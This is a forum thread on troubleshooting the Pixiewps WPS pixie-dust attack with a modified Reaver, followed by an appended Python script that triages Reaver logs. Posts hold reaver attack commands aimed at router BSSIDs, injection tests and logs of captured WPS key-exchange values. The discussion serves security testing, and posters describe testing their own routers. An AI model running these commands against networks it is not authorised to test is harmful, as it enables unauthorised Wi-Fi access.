Thread: Pixiewps: wps pixie dust attack tool

  1. Quote Originally Posted by soxrok2212 View Post
    Did you move reaver to bin after you compiled?
    ./configure
    make
    make install


    I think it overwrites the existing Reaver (because the existing reaver does not show the enrollee/E-Hash stuff, but installing the modified reaver shows the enrollee/E-Hash stuff but not PKE)... :/ So I think there is no need to copy reaver into bin.

  2. #2
    Quote Originally Posted by FurqanHanif View Post
    ./configure
    make
    make install


    I think it overwrites the existing Reaver (because the existing reaver does not show the enrollee/E-Hash stuff, but installing the modified reaver shows the enrollee/E-Hash stuff but not PKE)... :/ So I think there is no need to copy reaver into bin.
    See if it compiles and creates the executable. Then try to run it from that folder (no make install).

    chmod +x configure
    ./configure
    make distclean && ./configure
    make
    ./reaver -i mon0 etc.

  3. #3
    Join Date
    2015-May
    Posts
    1
    Hi,

    I cannot install pixiewps, I get the following message:

    gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
    In file included from pixiewps.c:51:0:
    pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1

    I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto and also the recommendation given by mmusket33, but I still have the same problem. I would really appreciate it if anybody could help me... Thanks in advance.

  4. #4
    Join Date
    2015-May
    Posts
    1
    @KIMW

    pixiewps is now in the official Kali repo; you can install it with "apt-get install pixiewps"

  5. #5
    If your Kali has been updated as of today, May 7, do you have the necessary tools installed and updated to successfully do the pixiewps attack? I have been testing my routers with WPS enabled and the firewall turned off etc. with no luck. I had some luck on a friend's D-Link when I used the pin, but it did not spit out the key. I am attaching what I seem to always get on my Broadcom and Asus; the ZyXEL just won't work at all. I am trying both adapters, 36neh and the 51nh, with no luck. It especially never spits out the hashes (ehash1 and ehash2) during the transaction. I am thinking I might have a bad installation of something. I have played around with trying different options as well, and also read through many tutorials which show people always getting the ehash1 and ehash2, which I never seem to get; maybe all the routers I try are not supported to spit those out....

    root@kali:~# time reaver -i wlan1mon -c 11 -b A8:39:44:41:10:E0 -K 1 -vv

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
    mod by t6_x <[email protected]> & DataHead & Soxrok2212

    [+] Switching wlan1mon to channel 11
    [+] Waiting for beacon from A8:39:44:41:10:E0
    [+] Associated with A8:39:44:41:10:E0 (ESSID: mil0)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d5:06:2e:f0:0b:f1:39:03:f3:e5:df:fe:c1:9f:cc:fb
    [P] PKE: 90:02:ed:eb:04:1b:a3:6a:b4:2a:7f:1b:79:c2:d9:ad:e2 :c2:3b:ab:ff:fa:82:27:c7:2f:e7:6a:91:0f:51:2d:20:e c:9d:02:f7:41:39:b4:c7:be:de:ca:8d:26:0e:af:19:a3: 8a:e4:84:cc:69:02:e8:f9:ec:15:a0:e2:87:32:0c:54:c6 :1c:4e:19:3d:25:02:49:fe:59:25:66:38:83:22:19:23:a a:f5:90:2e:41:b1:53:c4:68:94:ee:ea:a5:f0:4c:d8:d9: ec:c0:1b:85:0c:64:2f:3f:fd:6d:4b:1d:4f:2c:ea:1b:d0 :dd:ee:e5:85:ae:d5:ca:61:05:b0:8a:1d:23:df:b1:b6:f 3:6d:04:78:cd:14:c2:c2:80:48:54:4e:4c:77:91:9e:41: b9:65:94:5f:e9:06:6d:8f:90:d3:28:ff:f0:b7:2e:78:e3 :93:b6:ef:b1:26:43:b0:45:c5:0a:1a:be:20:6c:a5:3c:b e:3b:7e:2c:5e:a1:0b:19:b1
    [P] WPS Manufacturer: Broadcom
    [P] WPS Model Name: Broadcom
    [P] WPS Model Number: 123456
    [P] Access Point Serial Number: 1234
    [+] Received M1 message
    [P] R-Nonce: b0:e6:b2:95:77:cf:66:23:a3:89:be:19:c0:fb:4e:78
    [P] PKR: d5:c1:6b:bf:ff:50:8e:67:99:8c:d0:70:1f:7f:1f:60:12 :0b:a8:e3:84:a6:6d:1b:30:1a:81:94:e2:4d:3b:17:bc:d 3:db:64:7b:70:a7:1d:4b:05:2b:1e:39:03:92:79:63:a7: 56:0e:36:7d:af:89:27:7b:95:93:61:8f:e1:a5:b3:db:d1 :a8:6c:fa:05:1a:27:e6:20:18:1c:ed:ca:32:e3:4c:8e:6 1:fd:a2:31:18:6c:80:c8:ad:48:a2:d6:c7:30:6d:24:a1: 35:c1:7b:17:9c:72:e6:f9:67:d7:0b:0e:f6:19:24:58:67 :06:db:a0:23:a5:3e:f2:e8:de:e9:c4:d1:02:68:f9:76:f 6:83:c6:3d:d1:de:7b:fe:46:6b:aa:ca:e9:53:a9:d5:ca: 91:52:a7:08:ed:b1:92:4e:b3:b8:50:3c:32:fd:81:7f:bb :ca:b2:bf:8a:c7:ef:d8:3c:6d:0a:1d:9b:fa:a1:41:38:6 3:f7:a9:9a:4f:47:38:37:de
    [P] AuthKey: 53:60:51:4a:9f:af:ad:6b:10:5f:2a:fc:85:d4:f3:38:fc :88:2e:dc:52:f8:f4:5a:de:ee:90:e3:5d:3f:a9:96
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    real 0m13.437s
    user 0m0.260s
    sys 0m0.052s
    With the Asus N56U:

    [+] Associated with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [!] WARNING: Failed to associate with E0:3F:49:E3:73:71 (ESSID: MILLA)
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [P] E-Nonce: 0f:c9:4f:ac:5d:27:4c:06:13:74:6f:05:fc:ec:bb:19
    [P] PKE: ca:dc:10:7d:43:a3:ce:9a:9d:7f:0a:45:0f:bf:10:15:30 :6b:83:09:f2:d4:69:37:0a:eb:97:c7:27:56:63:70:a0:6 4:49:11:09:f0:39:3e:af:e9:e3:74:d2:2e:76:2b:52:b4: f6:87:a8:da:26:2c:dc:1a:d9:25:29:03:51:4e:3a:99:49 :32:14:62:8e:73:35:31:4c:21:fa:e7:a7:84:de:98:95:f 1:dc:f7:23:ff:25:d6:b7:fb:c8:0d:52:67:5f:11:96:bf: a3:d4:08:b3:99:7e:51:37:1a:46:4b:a6:6d:88:e1:56:c4 :a5:84:61:1a:a0:e4:f8:db:5c:ab:78:a9:0c:0c:d1:2c:8 e:67:0e:5f:37:ce:07:00:50:6d:6b:d9:e1:df:4c:6b:e2: 3c:f9:f5:85:84:67:54:56:79:61:84:d7:a0:b9:2c:14:02 :33:54:24:68:21:f5:e0:22:6c:00:b4:b3:5d:58:9e:49:9 2:85:06:cf:10:16:c3:3c:e8
    [P] WPS Manufacturer: ASUSTeK Computer Inc.
    [P] WPS Model Name: WPS Router
    [P] WPS Model Number: RT-N56U
    [P] Access Point Serial Number: 00000000
    [+] Received M1 message
    [P] R-Nonce: dd:00:db:6e:84:39:cd:26:d1:7c:bb:42:fa:f6:6b:cf
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
    [P] AuthKey: 6a:1e:35:9e:61:a6:13:8b:f9:b5:d1:33:b8:fa:07:e7:10 :80:20:76:9b:1e:d2:15:9e:8e:46:35:d1:65:2b:a8
    [+] Sending M2 message
    [+] Received M1 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    Should it be sending M3 msg?
    Last edited by undersc0re; 2015-05-07 at 16:55.

  6. #6
    Join Date
    2015-Jun
    Posts
    3
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .

  7. #7
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
    The wireless card probably does not support injection.

  8. #8
    Join Date
    2015-Jun
    Posts
    3
    It is unreliable, but I think injection works:

    sudo aireplay-ng -9 mon0
    14:00:37 Trying broadcast probe requests...
    14:00:37 Injection is working!
    .........
    14:00:39 Trying directed probe requests...
    14:00:39 84:9C:A6:A7:22:22 - channel: 2 - 'o2-WLAN25'
    14:00:39 Ping (min/avg/max): 0.978ms/5.656ms/47.815ms Power: -49.97
    14:00:39 30/30: 100%

    14:00:39 02:23:08:F9:33:11 - channel: 1 - 'EasyBox-C54211'
    14:00:40 Ping (min/avg/max): 0.926ms/7.952ms/44.700ms Power: -43.68
    14:00:40 28/30: 93%

  9. #9
    Quote Originally Posted by phoenix! View Post
    Hi kcdtv,
    I can send you the pcap files to your email, if you wish.
    Cannot upload pcap files in here.
    Sorry I didn't see your message.
    For sure; thank you very much! I send you a PM with my mail.
    @ bora.
    This is not really a "pixie dust issue" if you don't get an M3... It is an issue for the pixie dust attack, but the problem is about how the WPS flow is done.
    And more information would be needed to be able to guess where the problem can come from.
    It is unreliable, but I think injection works:
    Don't worry: it is reliable if aireplay-ng -9 works; your card can inject.

  10. #10
    Join Date
    2015-Jun
    Posts
    1
    Quote Originally Posted by bora View Post
    I run
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get M3 message (e-hash1 and e-hash2). I tried with several routers and the output from reaver never contains hash1 or hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on Ralink RT2860. Signal is good (1m distance).

    I use a laptop with Intel Centrino Wifi N card and reaver 1.5.2 from github mod by t6_x .
    I have the same problem. Using a 2011 MBP with broadcom drivers.
    Any help would be appreciated.

    Thanks!

  11. #11
    It is not that people don't want to help you, but your questions are off-topic.
    It could be an issue with reaver, with your card, with your system configuration or with the access point... etc.
    But for sure it has nothing to do with pixiewps: pixiewps needs you to collect the needed strings properly or it cannot brute force the M3.
    How to get the M3 to brute force it with its "authkey" is another question, another subject.
    Cheers
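
Added example, not part of the thread or of reaver/pixiewps: a small Python triage of a `reaver -vv` log that reports which WPS fields were printed and how far the exchange got, illustrating the point in posts #9 and #11 that a missing M3 is a capture problem rather than a pixiewps one. The sample log is constructed from the failure pattern in post #5 with shortened hex values, and the `E-Hash1`/`E-Hash2` label format is an assumption.

```python
import re

# Constructed sample: same message order as the failing run in post #5, hex values shortened.
SAMPLE_LOG = """\
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: d5:06:2e:f0
[P] PKE: 90:02:ed:eb
[+] Received M1 message
[P] R-Nonce: b0:e6:b2:95
[P] PKR: d5:c1:6b:bf
[P] AuthKey: 53:60:51:4a
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
"""

# Labels as printed in the thread's logs; the E-Hash labels are assumed to use the same "[P] name:" form.
FIELDS = ["E-Nonce", "PKE", "R-Nonce", "PKR", "AuthKey", "E-Hash1", "E-Hash2"]
FIELD_RE = re.compile(r"^\[P\]\s+([A-Za-z0-9-]+):\s*([0-9a-fA-F: ]+)$")
MSG_RE = re.compile(r"^\[\+\]\s+(Received|Sending) (M\d) message")
FAIL_RE = re.compile(r"WPS transaction failed \(code: (0x[0-9a-fA-F]+)\)")

def triage(log_text):
    """Summarise how far one WPS exchange got and which fields were logged."""
    seen, messages, failures = {}, [], []
    for line in log_text.splitlines():
        line = line.strip()
        if m := FIELD_RE.match(line):
            if m.group(1) in FIELDS:
                # Pasted logs often carry stray spaces inside long hex runs; drop them.
                seen[m.group(1)] = m.group(2).replace(" ", "").lower()
        elif m := MSG_RE.match(line):
            messages.append((m.group(1), m.group(2)))
        elif m := FAIL_RE.search(line):
            failures.append(m.group(1))
    received = [name for direction, name in messages if direction == "Received"]
    return {
        "missing": [f for f in FIELDS if f not in seen],
        "last_received": max(received, default=None),  # "M1" < "M3" as strings
        "m1_repeated": received.count("M1") > 1,        # AP restarted the exchange
        "failure_codes": failures,
    }

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```

On the constructed sample the summary shows a second M1 after M2 and no E-Hash fields, so the exchange never reached M3.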
